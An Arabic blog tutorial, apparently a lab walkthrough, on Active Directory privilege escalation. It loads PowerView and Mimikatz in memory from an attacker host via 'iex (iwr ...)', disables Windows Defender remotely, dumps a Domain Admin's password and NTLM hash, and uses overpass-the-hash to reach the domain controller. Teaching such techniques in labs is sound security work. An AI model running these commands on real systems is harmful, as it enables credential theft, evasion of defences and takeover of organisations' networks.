Privilege Escalation And Lateral Movement Part 2

Jehad Alqurashiمنذ سنة

السلام عليكم ورحمة الله وبركاته

الحمد لله على جميع نِعمه علينا ما علمنا منها وما لم نعلم حمداً والصلاة والسلام على نبينا محمد اشرف الخلق والمرسلين, اما بعد:

 

مقدمة:

في هذي المقالة راح نكمل الى ماوصلنا له اللي هو بعد اختراق ال CMS وكان هذا ال CMS شغال بصلاحية Local Administrators بيوزر اسمه ciadmin
 

ف يفضل تتابع المقالة السابقة عشان تكون بالصورة

المقالة السابقة

 

الشرح:


في المقالة السابقة تم تشغيل Mimikatz واطلعنا على الباسورد اللي في الميموري ولاحظنا انه مافي اي باسورد لمستخدم يهمنا عشان ودنا نتقدم بالاختراق الى مانوصل الى  Domain Controllers



 

الان راح اسوي Load ل اداة Power View  في الميموري عن طريق هذا الامر:

 

iex (iwr http://172.16.100.7:9090/PowerView.ps1 -UseBasicParsing)



راح ننفذ هذا الامر

Invoke-UserHunter -CheckAccess

ايش فايدة امر Invoke-UserHunter ؟

هذا الامر راح يشيك لي على كل الاجهزة اللي داخل ال Domain هل يوجد عليها مستخدم ضمن قروب Domain Admins  مسجل دخول على جهاز معين

وهل هذا الجهاز لنا Access عليه ك Local Administrator او لا

 

طيب ايش راح نستفيد؟
 

طبعا لو نفذنا الامر وطلع فعلا انه احد الاجهزة مسجل عليه دخول مستخدم ضمن قروب Domain Admins راح نقدر نشغل Mimikatz وناخذ ال NTLM الخاص في هذا المستخدم وبما انه ضمن Domain Admins راح نتمكن من الدخول على Domain Controller

 


نلاحظ مع بعض انه الجهاز اللي هو dcorp-mgmt يوجد عليه مستخدم svcadmin وهذا المستخدم ضمن قروب Domain Admins وعندنا صلاحية Local Administrator على هذا الجهاز



الان راح ننفذ اوامر على هذا الجهاز عن طريق هذا الامر
 

Invoke-Command -Computername dcorp-mgmt.dollarcorp.moneycorp.local -ScriptBlock {whoami;hostname}


الان راح نسوي Load ل اداة ال Mimikatz بس قبل لازم نسوي Disable للويندوز ديفندر عن طريق هذا الامر

 

Invoke-Command -Computername dcorp-mgmt.dollarcorp.moneycorp.local -ScriptBlock {Set-MpPreference -DisableRealtimeMonitoring $true}

بعدين نسوي Load ل اداة Mimikatz في الميموري عن طريق هذا الامر
 

iex (iwr http://172.16.100.7:9090/Invoke-Mimikatz.ps1 -UseBasicParsing)

الان نستدعي Mimikatz في جهاز dcrop-mgmt عن طريق هذا الامر

 

Invoke-Command -Computername dcorp-mgmt.dollarcorp.moneycorp.local -ScriptBlock ${function:Invoke-Mimikatz}

 

 الان زي مانلاحظ انه عندنا الباسورد ك Plain text واللي هو : *ThisisBlasphemyThisisMadness!!

وعندنا ك Ntlm hash و اللي هو : b38ff50264b74508085d82c69794a4d8

انا راح استخدم الخاص بال NTLM HASH عشان اعلمكم على تكنيك Overpass-the-hash لان مو دائما يظهر لك الباسورد ك  Plain text عن طريق اداة Mimikatz
 

الان راح ننفذ تكنيك Overpass-the-hash

 

راح نفتج powershell بصلاحية Administrator من جهازنا ونشغل اداة Mimikatz

 

وننفذ هذا الامر عشان يفتح لنا جلسة PowerShell بصلاحية المستخدم svcadmin

 

sekurlsa::pth /user:svcadmin /ntlm:b38ff50264b74508085d82c69794a4d8 /domain:dollarcorp.moneycorp.local /run:powershell.exe

 

 زي مانلاحظ انه فتح لنا جلسة بورشيل خاصة بالمستخدم svcadmin

الان بما ان المستخدم اللي داخلين فيه ضمن قروب Domain Admins يمكننا الدخول على جهاز ال Domain Controller طبعا كيف راح نعرف ايش اسم الجهاز الخاص بال Domain Controller


في اكثر من طريقه ممكن عن طريق اداة PowerView او عن طريق ال Mimikatz

 


نحن راح نستخرجه عن طريق اداة PowerView

راح نفتح جلسة PowerShell ونسوي Load ل اداة PowerView عن طريق هذا الامر

 

Import-Module .\PowerView.ps1

 بعد كذا ننفذ هذا الامر عشان يظهر لنا اسم الجهاز الخاص بال Domain Controller

 

Get-NetDomain

 زي مانلاحظ اسم الجهاز الخاص بال Domain Controller هو :

dcorp-dc.dollarcorp.moneycorp.local

الان كل اللي علينا نرجع للجلسة الخاصة بالمستخدم svcadmin وندخل لجهاز Domain Controller عن طريق هذا الامر:
 

Enter-PSSession -ComputerName dcorp-dc


وبكذا وصلنا الى اعلى صلاحية في ال Active Directory

 

اتمنى المقالة نالت على اعجابكم


شاكر لكم.

 

كلمات دليلية: hacking
1
إعجاب
1417
مشاهدات
0
مشاركة
2
متابع

التعليقات (0)

لايوجد لديك حساب في عالم البرمجة؟

تحب تنضم لعالم البرمجة؟ وتنشئ عالمك الخاص، تنشر المقالات، الدورات، تشارك المبرمجين وتساعد الآخرين، اشترك الآن بخطوات يسيرة !